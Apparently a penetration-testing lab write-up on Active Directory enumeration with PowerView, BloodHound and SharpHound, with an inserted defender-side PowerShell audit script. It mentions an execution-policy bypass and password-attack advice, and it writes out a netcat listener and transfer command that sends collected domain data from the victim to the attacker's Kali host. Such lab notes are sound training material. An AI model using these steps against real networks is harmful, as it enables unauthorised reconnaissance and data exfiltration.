Post enumeration of lab with credentials/hashes captured. Overview of PowerView and Bloodhound setup/usage.
Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent the attacks discussed. In no way should you use the information to cause any kind of damage, directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only perform testing on systems you OWN and/or have express written permission to test. Use the information at your own risk. By continuing to read, you acknowledge the aforementioned user risks/responsibilities.
Based on TheCyberMentor's amazing Udemy course, available at https://www.udemy.com/course/practical-ethical-hacking/
Requirements/Tools
Requirements: credentials recovered from the earlier MITM attack; the tools below use them.
Tools:
- PowerView — Link: https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon
- Bloodhound
Using PowerView
Download PowerView.ps1 to the target.
Execution policy bypass (the execution policy only controls whether scripts run; it is not a security boundary):
Execute PowerView
Very powerful tool with more information available via cheat sheet:
https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
Get Domain Policy:
Find the minimum password length and just start attacking with 7-character passwords.
Find Users:
Long, semi-unreadable list.
Refined list:
List the properties we can search for via a pipe:
Find when passwords were last set:
This shows whether there are stale passwords on the network.
Check Logon Count (used to identify honeypot accounts):
Check bad password counts (you can see whether an account is under attack):
List all network domain computers:
More information:
Slightly too much information.
Find the operating systems:
Use this to pick out which hosts on the network are the servers.
Find Domain Admins:
Get Members of Admins:
Find All SMB Shares on the Network:
Find All Group Policies:
Check GPOs for changes in display names and when they were changed:
Condensed version of a larger output.
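As an added example from the defender's side (not code from the original notes or from the PowerView project), the same attributes the PowerView walk-through above enumerates (password policy, pwdlastset, logon count, bad password count, operating system) can be audited with the RSAT ActiveDirectory module. It assumes RSAT is installed on a domain-joined host; the stale-password age and bad-password threshold are assumed values.

```powershell
# Added example: defender-side audit of the attributes enumerated above.
# Assumes the RSAT ActiveDirectory module and connectivity to a domain controller.
Import-Module ActiveDirectory

$StaleDays       = 365   # assumed: a password older than this is treated as stale
$BadPwdThreshold = 5     # assumed: badPwdCount at or above this suggests an account under attack

# Password policy: minimum length is the first thing the walk-through looks at.
$policy = Get-ADDefaultDomainPasswordPolicy
if ($policy.MinPasswordLength -lt 12) {
    Write-Warning "Minimum password length is $($policy.MinPasswordLength); 12 or more is recommended."
}

# Pull the attributes once. PasswordLastSet, LogonCount and BadLogonCount are the
# friendly forms of pwdLastSet, logonCount and badPwdCount.
$users = Get-ADUser -Filter 'Enabled -eq $true' `
    -Properties PasswordLastSet, LogonCount, BadLogonCount, LastLogonDate

# 1. Stale passwords: what the pwdlastset query surfaces.
$users | Where-Object {
        $_.PasswordLastSet -and $_.PasswordLastSet -lt (Get-Date).AddDays(-$StaleDays)
    } |
    Select-Object SamAccountName, PasswordLastSet |
    Sort-Object PasswordLastSet | Format-Table -AutoSize

# 2. Never-used accounts: a logon count of 0 is the honeypot signal mentioned above;
#    for a defender it is also a list of accounts that could be disabled.
$users | Where-Object { $_.LogonCount -eq 0 } |
    Select-Object SamAccountName, LastLogonDate | Format-Table -AutoSize

# 3. Accounts with many bad passwords: the "under attack" indicator.
#    Caveat: badPwdCount and logonCount are not replicated between domain
#    controllers, so each DC is queried and the per-DC value is reported.
$hits = foreach ($dc in (Get-ADDomainController -Filter *)) {
    Get-ADUser -Server $dc.HostName -Filter 'Enabled -eq $true' -Properties BadLogonCount |
        Where-Object { $_.BadLogonCount -ge $BadPwdThreshold } |
        Select-Object SamAccountName, BadLogonCount, @{ n = 'DC'; e = { $dc.HostName } }
}
$hits | Sort-Object BadLogonCount -Descending | Format-Table -AutoSize

# 4. Server inventory, matching the operatingsystem query above.
Get-ADComputer -Filter 'OperatingSystem -like "*Server*"' -Properties OperatingSystem |
    Select-Object Name, OperatingSystem | Sort-Object OperatingSystem | Format-Table -AutoSize
```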
Bloodhound
Downloads data from Active Directory and puts it into a visual graph.
neo4j console setup: change the default neo4j password.
Open the console link:
Log in with neo4j:neo4j
- prompted to change the password
Opted to use the kali password.
Neo4j Dashboard
Launch Bloodhound - Linux/Kali
Log in with the neo4j account and the neo4j URL. BloodHound is set up; the next step is to pull data with the ingestor.
Pull data with the ingestor
- Invoke BloodHound via PowerShell
Link: https://github.com/BloodHoundAD/BloodHound/blob/master/Ingestors/SharpHound.ps1
- Place it on the Windows 10 machine
Within the command prompt, set up the execution policy (ep) bypass:
Call SharpHound.ps1:
Invoke SharpHound:
Move the file to Kali. Used nc as the file transfer method; nc.exe was downloaded to the Windows machine via SimpleHTTPServer on Kali.
nc File Transfer Method:
- Kali setup listener: ncat -lvp 80 > file.zip
- Windows 10 machine: nc -nv 192.168.175.129 80 < file.zip -w15
File received:
Import file.zip into BloodHound via the upload button within BloodHound:
At this point my BloodHound crashed when loading file.zip, so I attempted to reinstall… and failed. Moved to building from source… failed. All mainly due to the fact that I was on the x86 version of Kali. Moved to installing BloodHound on a Windows 10 machine following these directions:
https://www.pentestpartners.com/security-blog/bloodhound-walkthrough-a-tool-for-many-tradecrafts/
Neo4j BloodHound issues:
IMPORTANT: When you install Java on the machine you will need to edit line 75:
and within the Java folder you need to copy the “client” folder and paste it as “server”:
Launch Bloodhound - Windows
From this point I was able to load file.zip into BloodHound:
Queries:
Finding domain admins via the “Find all Domain Admins” query.
You will want to target boxes where Domain Admins have accounts.
- Locating high-value targets via query, where the paths to follow are illuminated in red.
Once a network is compromised you can plan your next target with BloodHound.